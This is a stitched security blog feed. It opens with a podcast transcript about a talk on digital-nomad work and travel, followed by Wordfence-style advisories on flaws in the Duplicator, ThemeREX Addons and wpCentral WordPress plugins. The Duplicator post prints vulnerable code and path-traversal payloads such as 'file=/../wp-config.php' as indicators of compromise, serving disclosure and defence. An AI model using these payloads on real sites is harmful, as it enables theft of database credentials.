So, when I went to Japan we were standing in the subway just like trying to figure out where to go. We knew where we were going. We were just kind of indecisive and these two boys just came up to us and was like, “Do you need help? Do you know where you need to go?” And genuinely touched me so much that these people cared to help and same thing happened in Vancouver. We were lost, and someone came up to help. And I love interacting with these people that are just so willing to help and you get to experience these different cultures and you get to see these amazing things and I think that definitely makes travel while you’re working completely worth it even though there’s challenges. Which brings me to my next point is you’re going to have difficult challenges and you’re probably wondering why I would put this as why do you want to travel and work at the same time? But I’ll get to that in a second.

So you’re going to experience things like not having your VPN work when you need it to work. And that’s something I experienced in China. I didn’t plan, I obviously didn’t do any research and when I got there my VPN didn’t work and I need my VPN to do my job. So I just ended up having to take the whole week off which kind of sucked because I like to keep working and saved my PTO. And then you’re going to have challenges like wifi not working and you’re going to have just general travel challenges which is being in a different place after spending 36 hours on a plane. You were working on the plane, you could barely sleep. I have problems sleeping on planes. But with those difficult challenges and those beautiful experiences, you’re going to have personal growth. You’re going to grow as a person.

I personally have very bad anxiety, which has gotten so much better since I started traveling. I don’t do well in crowded spaces or things like that, but as I’ve traveled more and experienced different things and grown from these experiences, I have become less anxious of a person. And you can also just grow in the mindset. You can open your mind so much more and be more appreciative of everything in life. What brings me to my next point is you’re going to have a lot more positive energy and happiness. I’ve been through things traveling and you would too probably that would be challenging at the time. But you learn from those experiences and eventually things aren’t as bad as they were when you first started. You’re going to be more positive, you’re going to have a better outlook on things in certain situations and things that were bad, weren’t. And then with happiness, I am personally really happy because I travel all the time. I got to see a moose last week in Alaska, and I almost cried.

I feel like I get to be happy almost every single day. I mean obviously not every single day, but I definitely think that traveling has generally made me a happier person. And then for me, since I love my job so much, I feel like traveling helps me have a better work-life balance. So if I’m at home, I can sit on the computer all day just because I love my job, and I don’t want to disconnect from it. But when I’m traveling, I have that ability to disconnect cause I have something else that I love that I want to go do and I want to go explore. And I think if you have that same passion for your work, you might also have that same issue. So traveling might help you break away from working all the time, every day.

And then, where to begin? So you want to become a remote traveling worker and you don’t know where to start. Well, hello, hello. Okay. First things first, if you get a remote job if you don’t already have one or if you work for a company, you can try talking to them and seeing if they’d be willing to work out like you traveling for a little bit at a time and things like that. There’s so many great options. We’re obviously at a WordCamp, and so you can develop plugins, you can become a blogger, you can do so many different things. There’s so much freedom with WordPress and I think that’s how we all can have the ability to work remotely and then travel while doing so.

And then this one is make sure you’re prepared for your first trip if you haven’t done one yet. More so mentally. Things aren’t going to be perfect and you need to understand that things will go wrong and things are going to be frustrating. And just make sure you’re ready for that, and make sure you’re ready for things to go wrong. And I think that’s where you should be prepared, and you should plan like I never did.

And so then you’re going to want to plan your first remote work trip. My first trip was to Vancouver, it was a couple of weeks after I started at Wordfence, and I missed a meeting because they said I didn’t have to go to all the meetings, and I shouldn’t have done that. And I learned from that. And so with that trip I was on a boat for a couple of days and then in the Vancouver Harbor, I want to call it, I don’t know. But the first night we got there it was raining, and it was after a long flight and we took a dinghy out to get to the boat and it wasn’t the best. But then the second night it was great.

And so for your first trip I suggest doing a small little thing that is really memorable and then for the next few days, make sure you’re working while you’re there and seeing how it kind of flows. So when I travel now, I mostly do my things on the weekend, and I work during the week and just kind of get a feel for how that’s going to go for you.

And then I want to recommend starting small and gradually increasing your tripling. So don’t decide, oh, I’m going to go travel forever and find out you don’t like it just a couple of weeks into it. So I recommend starting smaller and then gradually increasing your trip lengths as you go. That’s how I kind of did it. I live in Florida, so I made little trips to Disney and St.Augustine and things like that. And it just kind of grew and grew over time. And last year I did two months away from home. And this year I have a few trips planned where it’s a month away and then I come back for a month.

And then once you have a feel for it and you decide that you do like it, I recommend determining how long you want to stay at places. I kind of figured out that a week isn’t really enough for me and I want to start staying at places for like a month at a time so I can kind of immerse myself a little bit better. Because when you’re working every day you don’t have as much time as if you’re just going to one destination. So I highly recommend staying longer, but figure out what works best for you. So my best single piece of advice is going to be to plan. That’s what I never did, and I think that would have saved me from so many different sticky situations that I had.

Determine your comfort zone. So, in that photo there’s a little outhouse. This is where I stayed in Alaska. It’s negative 30 degrees (Fahrenheit) there and I had to go to the bathroom in the outhouse and I was not okay with it at the start. But I actually enjoyed it, it’s nice, you have the birds chirping outside. And it wasn’t in my comfort zone before, but it’s in my comfort zone now. And so kind of figure out what your comfort zone is and then make sure you adapt with that over time. Figure out what kind of places you want to stay at, where you want to be. Do you want to be in places with lots of people? Are you going to be in places with little bits of people. And do you want to have fast working wifi all the time or are you comfortable working on one megabit per second? And kind of figure out what you’re comfortable with.

So, my second piece of advice is to budget accordingly. On my two month trip last year I was supposed to go to Paris at the end of it. I had flights booked and everything, but I ran out of money so I had to fly back home and that kind of sucked because I really wanted to go to Paris. But the lesson was learned there. Make sure you have enough money, budget accordingly. Make sure you say, “Okay, I’ll spend this much on food tonight. I’ll do that tomorrow.” I’m kind of in this place where I cook every night and then like do one night out at a nice place or do snacks here and there so I can try to taste all the different places. It’s important to consider accommodations, food and everything and your flights and make sure you budget accordingly.

Determine your workspace requirements. This is my boyfriend, we were at the Shanghai airport and that’s our makeshift desk because there was no tables or chairs available. Two luggages stacked on top of each other. And then our carry-on bags were our chairs. So you kind of want to determine are you comfortable working in a bed? Are you comfortable working at a desk? Do you need a co-working space? Do you need these certain things? And then you’ll also want to take that into account when you plan where you go and your budget. So if you want to go to somewhere, you’ve just got to make sure that they have your workspace requirements ready for you.

And then work out your work requirements. Like do they require you to use a VPN? Do they require you to do full disk encryption? Do they require you to not go to certain places? And I also would like to recommend that talk to them and let them know when you’re going to be places and if you work for yourself, this is not relevant. But if you do work for a company, make sure you let them know where you’re going. That way if you have any hiccups like I did, then they are already informed, and they’re going to be willing to help you and work things out with you. And then set your schedule accordingly.

There’s different time zones everywhere and if you’re on one side of the world and you work for a company and they’re on the other side of the world, or you’re a freelancer and you work with clients and they’re on one side of the world and you’re on the other, you need to make sure you’re setting your schedule accordingly and making sure you’re going to be available for anybody that might need you at work. When I went to China, my plan was to work from eight to 12 in the morning and then eight to 12 at night and then get my rest and do things during the day in that eight hour chunk. And well I ended up not being able to work. But that was my plan and I think you should set schedules in advance and then try and work with those when you’re in the place.

Now, always remember that things will not always be perfect, like ever. Hiccups are always going to happen. I don’t want to say never going to go as planned, but it probably isn’t going to go as planned a lot of the times. And so you just got to keep that in mind. And you got to take things slow and absorb everything. You got to make sure that even though things aren’t always perfect, you want to make sure that you’re still enjoying every little thing. So when I went on a Norwegian fjord cruise, my wifi cut out halfway through the fjords and I was pretty bummed about it, but I was like,”You know what? I’m in Norway, I got to just breathe, I can’t get my work done, it’s not going to be a problem.” And so you got to make sure that you remembered to take everything in even though work things might not go as planned. Because you can always work and make up your work. It’s not always guaranteed that you’re going to go back to a certain place that you’ve been or experience one particular moment that you’re in.

And then document everything. Make sure you take a lot of photos, make sure you take a lot of videos, write down notes. I think this is really important because once you’ve gone to a lot of places, you might start slowly forgetting certain things and then when you have these photos to come back to, you’ll be like, “Wow, I totally forgot about this. But I really loved it.” And I’ve had that happen multiple times and I think it’s very important to document everything. And then consider private journaling or blogging. We have WordPress, we can make blogs and we can share our stories with everyone. That’s something I’m personally trying to work on now is coming up with a blog and I’m trying to share my stories with other people. Because I have something to learn from you and you have something to learn from me, hopefully. Maybe. Yeah. So I like to share what I’ve learned and things and I think it’d be great if everybody shared everything that they learned. Because then everybody would not know everything.

And then I have some helpful resources for success. So this is a program called Remote Year. They provide, I think I want to say 3, 6, and 12 month programs. And they take care of your travel and accommodations and things like that. I think it’s five grand for a down payment and then two grand a month.

This is if you want to work and not have to worry about any of the travel planning. My favorite part is the travel planning, so I like the flexibility and freedom and finding good deals and things like that. So this isn’t for me, but it definitely can help you out if you don’t want to have that headache.

And then workingnomads.com is a place where you can find remote jobs if you don’t already have one. I like that the first three were WordPress because Automattic is a fully remote company as is Wordfence and a lot of other plug-in companies, and WordPress hosting companies.

Okay, and then I wanted to show you this one, Nomad List. It’s a really awesome resource and it can help you plan where you’re going to go. So let’s say you want to stay somewhere where the internet speed is higher, you can select internet speed right here, and then you can scroll down and you can see a lot of places that have higher internet speeds if that’s a requirement for you.

And then you can see the cost of living, you can see a cost of living for family, you can go to the scores, you can see the nomad scores, internet speed, humidity, walkability, all sorts of helpful resources for you to decide where you want to go on your trip.

Audience question:
Can you put up that last website you mentioned and the name of it again?

Chloe:
This one? Working Nomads.

Audience question:
No, the one you just finished.

Chloe:
Nomad List?

Audience question:
Yes. Thank you.

Chloe:
Yeah. And then I like to recommend Airbnb for accommodations and you can find really good bargains on there. In Thailand, you can stay there for $300 a month, which is on my list of places to go, and so you can find really reasonable places. And if you’re going to be traveling and you want to keep your house and you’re comfortable letting people into your home, you might want to consider Airbnb-ing out your house. You don’t have to do that obviously, but you can consider doing it. I personally do it and it helps me travel more, so I definitely recommend looking into that if it’s an option for you.

And then, because I’m a security professional, I just wanted to throw some security tips at you for while you’re traveling. Use a VPN wherever you go. If you’re going to be working in coffee shops and in public spaces, you want to use a VPN to make sure that your traffic is going to be encrypted when it’s running through the web. And make sure that nobody can ease drop on your traffic and steal work data or anything like that.

I recommend using a password manager and an authenticator app. Make sure you have one that’s going to be compatible with your phone and your computer. There’s LastPass, 1Password. Those are the two that come to my mind. Use an authenticator app that works offline.

Don’t use SMS. SMS isn’t secured, kind of. So use an authenticator app because if you go on a cruise like I do, you don’t have … I don’t pay for Wi-Fi on more than one device so I can only have one device logged in at a time. And having an authenticator app that works offline allows me to do that and log into my sites without having any issues.

And then use full disk encryption. If your devices are ever stolen, people won’t be able to steal the information off of your devices. And if you’re storing work data on there, this is pretty important because you don’t want someone to get ahold of any secret information.

Disable Bluetooth when not in use because if you’re working in public spaces and you have Bluetooth enabled, people can actually intercept the session and get access to your phone and things like that. And you don’t want that to happen, especially if you’re dealing with work.

And then be aware of your surroundings. Consider getting a privacy screen on your computer. If you work on airplanes and things like that and coffee shops, you don’t want people to be able to look at your screen and see what you’re doing. I work on airplanes a lot of the time. And I need to get a privacy screen and things like that as I start traveling more, and it’s definitely something you should consider. And just generally be aware of your surroundings, and seeing if anybody’s trying to look at your computer or things like that.

Then thank you. You can find me on Twitter @infosecchloe. You can email me at chloe[at]wordfence.com if you have any questions. And, again, my slides are available at chloechamberland.com/wordcampPhoenix. And now I’m happy to take any of your questions.

Chloe:
Yes?

Audience question:
What do you recommend for a VPN?

Chloe:
What do I recommend for a VPN? I use PIA. There’s several different options, though, so I recommend just looking up the best VPN options and then looking at some of the reviews of the top few and then seeing what works best for you.

Chloe:
Yes?

Audience question:
How do you pay for [inaudible] cash or do you just pay with credit card?

Chloe:
What was the question? It is how do you deal with different currencies at different locations?

Audience question:
Yeah.

Chloe:
I use credit cards and then sometimes I take out cash. I have a zero … I have a fully online banking company that does zero charges on ATM withdrawals and and foreign transaction fees. So that’s definitely the way to go.

Audience question:
Can I ask what bank that is?

Chloe:
Yeah.

Audience question:
What bank is that?

Chloe:
Oh, what bank? I use Bank of the Internet.

Audience question:
Bank of the Internet.

Chloe:
Yeah. Oh, sorry. It’s called Axos now. Yeah, they changed the name.

Audience question:
What did you do with the cats? What did you decide?

Chloe:
What did I do with the cats? They’re at home, and my boyfriend’s mom watches them for us every time we go. I need to get them to come with us.

Audience question:
What do you do about a hot spot or cellular Wi-Fi access?

Chloe:
What do I do about a hotspot or cellular Wi-Fi access? I currently don’t have a hotspot yet, but that’s something I’m looking into right now. I usually just use my phone in the the U.S. as a hotspot. But my cell phone, I have T-Mobile and it works in just about every country out there. So that’s what I do for my cell phone.

Audience question:
And when you said you were working with clients, how are you communicating with them? What app or resource are you using?

Chloe:
Yeah, so at work, we use a ticket manager system, because I was dealing with customer service regarding plugins and things.

Audience question:
… calls with them or anything?

Chloe:
No, no calls. It was fully online. Yeah. Any other questions? Yes?

Audience question:
What’s the longest trip you’ve taken?

Chloe:
The longest trip I have taken was two months long. Yeah. I’m hoping to go fully remote eventually.

Audience question:
Where to?

Chloe:
That was the one to … So we took a cruise to London and then we had to fly back to do something real quick. And then we flew back to London, took a cruise to the Norwegian fjords, and then we flew to Italy from there, spent a few nights in Rome, then went to Venice, and then we flew from Venice to China and stayed in Beijing for a few nights, and then we took a cruise to Japan, went around Japan a little bit, and then Japan back to China, went to Shanghai, went to Disney a little bit, and then that’s when we had to fly back home. So we went to Seattle, stayed there for a couple of nights, and then flew back to Florida. Yeah, it was fun.

Audience question:
So with your current job, is it project based where you can kind of go on whenever you want as long as you do 40 hours a week? Or do you have to log in at certain times just with the time zone difference. I’m curious.

Chloe:
Yeah. So my work is pretty flexible. I don’t have to deal with customers as much anymore. I do have core hours, but it’s only like a four hour time period. And the people I work with are so flexible that it’s not that big of a deal to have to be there as long as I communicate with them and let them know, “Hey, I’m going to China. The time zone’s 12 hours different,” and they’re really flexible working with me. Yeah.

Chloe:
Yes?

Audience question:
How do you keep yourself focused on your work and not get distracted by other things when you’re working?

Chloe:
So how do I keep myself focused and when I’m traveling? I love my job. I really do. So that really helps me sit down and get my work done. I get to go hunting for vulnerabilities and plugins and things. I have free reign to just explore. I absolutely love it. And so that’s kind of what keeps me settled in.

And so if you’re planning on going remote and working and things like that, find something you love to do. It’ll help you.

Chloe:
Yes?

Audience question:
You mentioned Airbnb. Were there any other resources you use to find lodging?

Chloe:
Yeah. So I mentioned Airbnb. Is there any other resources? There’s Vrbo. Hotels are always an option. I generally stick to Airbnb. That’s just my favorite platform to use and it’s really easy and I can always find cheap things for wherever I need to go. So that’s my main one.

Audience question:
The one time I’ve used Airbnb, I had a rude shock because it wasn’t what it was advertised as. …

Chloe:
I haven’t had that happen. I’ve stayed at several Airbnbs. But that can happen. You have hosts opening their homes. It can take … Actually, I did. Okay. So I just remembered. So when I went to Vancouver on that boat, there was these pictures of this really nice boat, clean, had like a nice table and everything. And I got on it and it was raining and everything and the boat was not what it pictured at all. The bathroom was really small and there was no area to sit. It was just a bed that was damp and cold, and not like the photos at all.

Chloe:
But I still like Airbnb and I gave it another shot, and I’m actually staying at one down the street and it’s nice, and it’s nice to have a kitchen and things like that with it.

Audience question:
You’ve found that it’s generally honest?

Chloe:
Yeah, it’s generally honest. Yeah. yeah.

Audience question:
Do you mind if I add to that question, too?

Chloe:
Yeah, of course.

Audience question:
So another cool way to travel, if you’re looking for lodging options or alternatives, you can do house or pet sitting in different countries and so you stay at that house for free. Sometimes they’ll even pay you or leave food in the house for you. So if you’re going to be working remotely, you can stay at someone else’s house, maybe just pet their cat every few hours and make sure it has food and get free rent. So that’s another idea.

Audience question:
That’s nice. Thank you.

Audience question:
Yeah.

Chloe:
Yeah, I know exactly what you’re talking about because I looked into that. I don’t remember the name of it, though.

Chloe:
Yeah?

Audience question:
Do you ever hire a local to be a guide for language purposes?

Chloe:
Do I ever hire a local to be a guide for language purposes? Not right now. I haven’t really gone to anywhere yet that’s been like too drastically different where I required that, but I’m going to Morocco next month and I was going to hire a guide for a day. It’s actually really reasonably priced there, and so that’s somewhere I’m going to do it.

Audience question:
And how do you find them?

Chloe:
Airbnb. They actually have experiences now and so that’s where I’m going to test this out and see how it goes.

Chloe:
Any other questions?

Audience question:
Where are you going in Morocco?

Chloe:
I’m going to Marrakesh.

Audience question:
You going to go to Chefchaouen?

Chloe:
What’s that?

Audience question:
You going to go to Chefchaouen?

Chloe:
No. What’s that?

Audience question:
The Blue City. It’s [inaudible 00:47:46] one of the Atlas Mountains.

Chloe:
Okay. I’ll look into that. Thank you.

Audience question:
Have a nice trip.

Audience question:
Where all are you going on your next trip?

Chloe:
So next month I am going on a transatlantic cruise. I’m going to get dropped off in Barcelona where I fly to Morocco and then I’m going to spend a week in Marrakesh and then I’m going to fly to Sweden, spend a week there. I’m going to come home. I’m going to be there for two weeks and then I’m going to take another cruise that drops me off in London, fly back from there. And then the next month, I go off to Japan, which I’m really, really excited to go back to. I’m going to be there for a week and a half, do another cruise, a transPacific that takes me over to Vancouver, and then I’m going to fly home.

And then I have some more trips planned towards the end of the year, another couple of cruises in Japan. And then at the end of the year, I really want to go to Europe for a month and see all the Christmas markets in December.

Audience question:
I know cruise internet is often slow and expensive. what do you do for that?

Chloe:
Yeah, it is really slow. What I do is I just kind of account for that and spend a little bit of extra time each day. And I stick to one cruise line, Royal Caribbean, because they have the cheapest Wi-Fi, so that’s how I make that work.

Chloe:
Any other questions? Yes?

Audience question:
You seem to be traveling quite a bit. Is it by choice or is it becomes you employer requires you to be at the location?

Chloe:
Is it by choice or is it because my employer requires me to be anywhere? It’s completely by choice. I choose to do this all the time and I really enjoy doing it.

Audience question:
I remember doing a lot of work for customers in California. And then when I moved out here to Tucson, to Arizona, I found that we worked together for a while, but after six months of not being in contact with them face to face, they started losing interest in and then going elsewhere to somebody else that they develop a relationship with. How do you keep the relationships going when you’re not there?

Chloe:
So I work for a company, and they’re just fully remote, and so all of our communication is done through the ticketing platform. And I’m not sure why they haven’t lost touch. It’s not like we provide like a long-term service to our customers. It’s more of like one time kind of thing.

So like when we clean a hacked site, it’s going to happen one time, so I would communicate with them for a day as I clean their site, and they would go about their way. And if they ever had any problems, they would just come back to us and we could help them out there.

Specifically speaking towards keeping relationships, I could recommend a conference calling. Did you do that? Like face-to-face on Zoom.

Chloe:
We do that now.

Chloe:
Yeah? Okay.

Audience question:
And you don’t have trouble with connectivity with the Zoom call or something like that?

Chloe:
No, I’ve been able to handle my meetings and things like that just fine wherever I’ve been.

Audience question:
Was the question about …

Chloe:
Communicating with customers. Yeah.

Audience question:
Yeah. …

Chloe:
Yeah, yeah. Mark’s back there. He can definitely help you with that. He’s the CEO of Wordfence and knows how things run. All right.

Audience question:
Are you going to any WordCamps?

Chloe:
I’m going to WordCamp Miami at the end of this month, and then from there I’m not sure yet, but I’m sure I’ll be at more.

Audience question:
Awesome.

Chloe:
Any other questions?

Audience question:
If there are any apps that are helpful for traveling?

Chloe:
Any blogs?

Audience question:
Apps.

Chloe:
Apps? I personally don’t use any so I couldn’t give you any right now, but I definitely need to look into some that can help manage my travel a little bit better. I just haven’t had time to fully dive into that.

Audience question:
When is your blog starting?

Chloe:
When is my blog starting? Yeah, so my website is chloechamberland.com and I’m hoping to start writing posts for that, and I’m trying to share everything I’ve learned and hopefully give tips and things like that so it makes it easier on other people, and maybe people will comment and give me their advice, too, because I’m always welcome to learning more things.

Any other questions? All right. Thank you guys so much.

Kathy Zant:
Thank you for listening to Think Like a Hacker episode 66. We hope you enjoyed it. If you’d like to follow Chloe, she is @InfoSecChloe on Twitter. You can follow me @KathyZant on Twitter. You can also follow the @Wordfence account with all the latest news about WordPress and security.

And we’d love to hear from you. If there’s someone you’d like us to talk to as an interview subject or if there is a topic you’d like us to explore more in depth on Think Like a Hacker, we’d love to hear from you. press@wordfence.com comes straight to me, and I can make those dreams come true.

Thanks again for listening and we will be back again next week. If you’re going to be at WordCamp Miami, please do find me. Say hi. I love to hear from people who are listening to the podcast. We’ll talk to you soon.

The post Episode 66: New Plugin Vulnerabilities & Succeeding as a Digital Nomad with Chloe at WCPHX appeared first on Wordfence.

Read More

Active Attack on Recently Patched Duplicator Plugin Vulnerability Affects Over 1 Million Sites

Description: Unauthenticated Arbitrary File Download
Affected Plugin: Duplicator
Affected Versions: <= 1.3.26
CVSS Score: 7.5 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Patched Version: 1.3.28

A critical security update was recently issued for Duplicator, one of the most popular plugins in the WordPress ecosystem. Over a million WordPress sites were affected by a vulnerability allowing attackers to download arbitrary files from victim sites. We urge all Duplicator users to update to version 1.3.28 as soon as possible.

We are detecting active exploitation of this vulnerability in the wild, and estimate more than half a million sites are still running a vulnerable version. Built-in firewall protection prevents these attacks for all Wordfence users, both Premium and those still on the free version of Wordfence. As always, it’s still important to perform security updates regardless of other protections.

In today’s post, we’ll take a brief look at the vulnerable code, discuss its severity, and share details of the ongoing attacks against it.

File Download Vulnerability Analysis

The Duplicator plugin helps site administrators migrate and copy WordPress sites. Part of this functionality involves exporting database and file content into portable archives. When an administrator creates a new copy of their site, Duplicator lets them download the generated files from their WordPress dashboard.

Screenshot of a Duplicator download prompt.

Screenshot of a Duplicator download prompt.

This was implemented as an AJAX request within Duplicator’s admin interface. The download buttons each trigger a call to the WordPress AJAX handler with the action duplicator_download and a file parameter, indicating the location of the file to be downloaded. When clicked, the requested file is downloaded and the user doesn’t need to leave or reload their current page.

public static function duplicator_download() {
        $file = sanitize_text_field($_GET['file']);
        $filepath = DUPLICATOR_SSDIR_PATH.'/'.$file;
        // Process download
        if(file_exists($filepath)) {
            // Clean output buffer
            if (ob_get_level() !== 0 && @ob_end_clean() === FALSE) {
                @ob_clean();
            }

            header('Content-Description: File Transfer');
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
            header('Expires: 0');
            header('Cache-Control: must-revalidate');
            header('Pragma: public');
            header('Content-Length: ' . filesize($filepath));
            flush(); // Flush system output buffer

            try {
                $fp = @fopen($filepath, 'r');
                if (false === $fp) {
                    throw new Exception('Fail to open the file '.$filepath);
                }
                while (!feof($fp) && ($data = fread($fp, DUPLICATOR_BUFFER_READ_WRITE_SIZE)) !== FALSE) {
                    echo $data;
                }
                @fclose($fp);
            } catch (Exception $e) {
                readfile($filepath);
            }
            exit;
        } else {
            wp_die('Invalid installer file name!!');
        }
    }

Unfortunately the duplicator_download action was registered via wp_ajax_nopriv_ and was accessible to unauthenticated users. To make things worse, no validation limited the filepaths being downloaded. The file parameter is passed through sanitize_text_field and appended to the plugin constant DUPLICATOR_SSDIR_PATH, but directory traversal was still possible. An attacker could access files outside of Duplicator’s intended directory by submitting values like ../../../file.php to navigate throughout the server’s file structure.

In addition to the AJAX action, the same vulnerability existed in Duplicator’s duplicator_init() function, which is called by WordPress’s init hook.

function duplicator_init() {
    if (isset($_GET['action']) && $_GET['action'] == 'duplicator_download') {
        $file = sanitize_text_field($_GET['file']);
        $filepath = DUPLICATOR_SSDIR_PATH.'/'.$file;
        // Process download
        if(file_exists($filepath)) {
            // Clean output buffer
            if (ob_get_level() !== 0 && @ob_end_clean() === FALSE) {
                @ob_clean();
            }

            header('Content-Description: File Transfer');
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
            header('Expires: 0');
            header('Cache-Control: must-revalidate');
            header('Pragma: public');
            header('Content-Length: ' . filesize($filepath));
            flush(); // Flush system output buffer

            try {
                $fp = @fopen($filepath, 'r');
                if (false === $fp) {
                    throw new Exception('Fail to open the file '.$filepath);
                }
                while (!feof($fp) && ($data = fread($fp, DUPLICATOR_BUFFER_READ_WRITE_SIZE)) !== FALSE) {
                    echo $data;
                }
                @fclose($fp);
            } catch (Exception $e) {
                readfile($filepath);
            }
            exit;
        } else {
            wp_die('Invalid installer file name!!');
        }
    }
}
add_action('init', 'duplicator_init');

Because it was hooked into init, this function was executed on every WordPress page load for logged-in users and unauthenticated visitors alike. This means an attacker could trigger a file download by adding query strings to any path on a vulnerable site, bypassing AJAX-specific monitoring.

Both of these vulnerable cases have been patched as of Duplicator 1.3.28. The AJAX action has been updated to properly validate filenames, and now requires a matching ID and hash to allow the file download. The duplicator_init() function has been removed entirely.

Attackers Stealing Database Credentials

Arbitrary file download vulnerabilities can be a critical issue regardless of the vulnerable site’s platform, but such attacks against WordPress sites largely target one file: wp-config.php.

Depending on the site, wp-config.php can contain any amount of custom code, but attackers target it to access a site’s database credentials. With these credentials, an attacker can directly access the victim site’s database if it allows remote connections. This access can be used by an attacker to create their own Administrator account and further compromise the site, or simply to inject content or harvest data.

Sites with local databases still have cause for concern, however. On shared hosting environments, it’s possible for one user on a shared server to access the local database of another site on the same server. This certainly limits the attack surface of the vulnerable site, but is still a severe issue.

At the time of this writing, Wordfence has blocked more than 60,000 attempts to download wp-config.php files with this vulnerability. About 50,000 of these events took place before Duplicator patched the flaw, making this a zero-day vulnerability.

Nearly all of these attacks were issued from the same IP address: 77.71.115.52. This IP points to a webserver located in Bulgaria, owned by Varna Data Center EOOD. A handful of websites are hosted on this server, suggesting the attacker could be proxying their attacks through a compromised website. We have associated this IP address with other malicious activity against WordPress recently, and research into its activity is ongoing.

Indicators Of Compromise (IOCs)

The following Indicators of Compromise (IOCs) can be used to determine if your site may have been attacked.

  • Traffic logged from the threat actor’s IP address should be considered suspicious:
    • 77.71.115.52
  • Attacks in this campaign are issued via GET requests with the following query strings:
    • action=duplicator_download
    • file=/../wp-config.php
    • Note: Because this vulnerability can be exploited via WP AJAX, it’s possible to exploit via POST request. In this case, it’s possible for the action parameter to be passed in the POST body instead of the query string. This will prevent the action=duplicator_download string from appearing in HTTP logs. The file parameter must be passed as a query string, however, and is a reliable indicator.

Timeline

  • February 10th, 2020 – First attacks against Duplicator vulnerability. Wordfence users already safe due to built-in firewall protection.
  • February 12th, 2020 – Duplicator releases version 1.3.28 to patch the flaw.

Conclusion

Duplicator’s massive install base, combined with the ease of exploiting this vulnerability, makes this flaw a noteworthy target for hackers. It’s crucial that Duplicator’s users update their plugins to the latest available version as soon as possible to remove this risk. All Wordfence users are protected from these attacks, but don’t forget to update despite this. Also, due to the nature of Duplicator’s functionality, it’s likely that it’s no longer required on your site. If you have no intent of using it to migrate or clone your site in the immediate future, you can delete the plugin without worry. It can always be reinstalled later if needed.

If you believe your site was attacked via this vulnerability, it’s critical that you change your database credentials and WordPress salts immediately. If you’re concerned that an attacker may have gained unauthorized access to your site, consider having our expert analysts perform a Site Security Audit to ensure your security is intact.

 

The post Active Attack on Recently Patched Duplicator Plugin Vulnerability Affects Over 1 Million Sites appeared first on Wordfence.

Read More

Zero-Day Vulnerability in ThemeREX Addons Plugin Exploited in the Wild

Description: Remote Code Execution
Affected Plugin: ThemeREX Addons
Affected Versions: Versions greater than 1.6.50
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Patched Version: Currently No Patch.

Today, February 18th, our Threat Intelligence team was notified of a vulnerability present in ThemeREX Addons, a WordPress plugin installed on an estimated 44,000 sites. This flaw allows attackers to remotely execute code on a site with the plugin installed, including the ability to execute code that can inject administrative user accounts.

At the time of writing, this vulnerability is being actively exploited, therefore we urge users to temporarily remove the ThemeREX Addons plugin if you are running a version greater than 1.6.50 until a patch has been released.

Wordfence Premium customers received a new firewall rule today, February 18th, 2020, at 3:16PM UTC to protect against exploits targeting this vulnerability. Free Wordfence users will receive the rule after thirty days on March 19th, 2020.

REST-API Endpoint Unprotected and Improperly Configured

ThemeREX Addons is a plugin installed as a companion to many ThemeREX themes and provides a number of theme management features. One of the plugin’s functions registers a WordPress REST-API endpoint. When doing so, it does not verify that a request is coming from an administrative user.

While this is not cause for concern on its own, the endpoint allows any WordPress function to be executed, rather than being limited to a select few functions. This means that remote code can be executed by any visitor, even those that are not authenticated to the site. The most worrisome capability that we are seeing actively attacked is the ability to create a new administrative user, which can be used for complete site takeover.

Indicators of Compromise

We currently have very little data on who is exploiting this vulnerability and what artifacts are being left behind, however, we do know that attacks are targeting administrative user account creation. If you are running the ThemeREX Addons plugin on your site and you discover a new suspicious administrative account, it is very likely that your site was compromised as a result of this vulnerability. We will provide more information as details emerge.

Conclusion

We have intentionally provided minimal details in this post in an attempt to keep exploitation to a bare minimum while also informing WordPress site owners of this active campaign. We will release a follow-up post with further details once the developer patches this vulnerability.

For the time being, we urge that site owners running the ThemeREX Addons plugin remove it from their sites immediately. Sites running Wordfence Premium have been protected from attacks against this vulnerability since February 18th, 2020. Sites running the free version of Wordfence will receive the firewall rule update on March 19th, 2020.

The post Zero-Day Vulnerability in ThemeREX Addons Plugin Exploited in the Wild appeared first on Wordfence.

Read More

Vulnerability in wpCentral Plugin Leads to Privilege Escalation

Description: Improper Access Control to Privilege Escalation
Affected Plugin: wpCentral
Affected Versions: <= 1.5.0
CVE ID: CVE-2020-9043
CVSS Score: 8.8 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Patched Version: 1.5.1

On February 13th, our Threat Intelligence team discovered a vulnerability in wpCentral, a WordPress plugin installed on over 60,000 sites. The flaw allowed anybody to escalate their privileges to those of an administrator, including subscriber-level users given open registration was enabled on a WordPress site with the vulnerable plugin installed.

The flaw also allowed for remote control of the site via the wpCentral administrative dashboard. This would be considered an improper access control vulnerability that led to privilege escalation. We privately disclosed the full details to the plugin’s developer on February 13th, and they reacted promptly by releasing a patch the next day along with a few additional security enhancements.

This is a high severity security issue that could cause severe impact to your site. We highly recommend updating to the latest version, 1.5.2, immediately.

Wordfence Premium customers received a new firewall rule on February 14th to protect against exploits targeting this vulnerability. Free Wordfence users will receive the rule after thirty days, on March 15th.

What is wpCentral?

wpCentral is a WordPress plugin that was designed to be used in tandem with the wpCentral management dashboard to provide a connection between WordPress sites and a management interface. Their software is designed to make site management easy, with functionalities including automated sign-on with one click from the wpCentral dashboard, the ability to create back-ups, edit posts (in the premium version), and much more.

In order to provide this connection between the site and the management dashboard, the plugin generates a random 128 character authorization key, stored as the wpcentral_auth_key, also referred to as the “connection key.” This key is used to add a site to the wpCentral dashboard, in addition to being used as the auth_key when sending requests from the wpCentral dashboard. It is an important part of the authentication and authorization process, and because of its capabilities, it requires strict protections to prevent unauthorized use.

Connection Key Always Displayed in Admin Footer

Unfortunately, we discovered that there were weak access controls in place to protect the connection key as it was displayed in the admin_footer in a modal dialog.

 add_action('admin_footer', 'wpc_modal_dialog');

The admin footer checks to see if a page being accessed is part of the administrative interface and will display whatever is requested in that area. However, it does not verify that the user has ‘administrator’ capabilities — a common misconception with the series of functions that contain the label `admin`. This meant that any user logged in, regardless of capabilities, would have access to view any content in the modal dialog that was displayed as part of the admin_footer.

The modal dialog box that was displayed as part of the admin footer exposed the connection key along with steps that could be used to connect a site to wpCentral.

